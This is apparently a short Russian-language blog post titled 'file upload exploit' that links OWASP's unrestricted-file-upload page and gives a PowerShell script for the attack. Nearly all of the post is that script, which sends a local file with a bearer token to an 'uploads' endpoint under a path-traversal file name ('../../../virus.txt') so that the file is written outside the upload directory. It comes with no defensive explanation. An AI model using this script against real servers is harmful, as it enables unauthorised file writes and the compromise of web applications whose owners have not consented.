вторник, 10 марта 2020 г.

file upload exploit

https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

  1. $url = "url/uploads";
  2. $targetFileName = "../../../virus.txt";
  3. $sourceFilePath = "C:\temp\ipaddrs.txt"
  5. $access_token = "Bearer XXXXXXXX"
  7. $file_bytes = [System.IO.File]::ReadAllBytes($sourceFilePath)
  8. [System.Net.Http.HttpClient]$httpClient = New-Object System.Net.Http.HttpClient;
  9. [System.Net.Http.MultipartFormDataContent]$form = New-Object System.Net.Http.MultipartFormDataContent;
  11. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Accept", "application/json, text/plain, */*") | out-null
  12. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Authorization", $access_token)  | out-null
  13. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36")  | out-null
  14. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Accept-Language", "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7") | out-null
  16. [System.Net.Http.ByteArrayContent]$byteContent = new-object System.Net.Http.ByteArrayContent([byte[]]($file_bytes), 0, $file_bytes.Length)
  18. $form.Add($byteContent, "file[]",$targetFileName)
  19. $response = [System.Net.Http.HttpResponseMessage]$response = $httpClient.PostAsync($url, $form).Result
  20. $sd = $response.Content.ReadAsStringAsync().Result
  21. $sd | fl *
  22. $httpClient.Dispose()

https://pastebin.com/apXwAwYc
Автор: на Комментариев нет:
Подписаться на: Сообщения (Atom)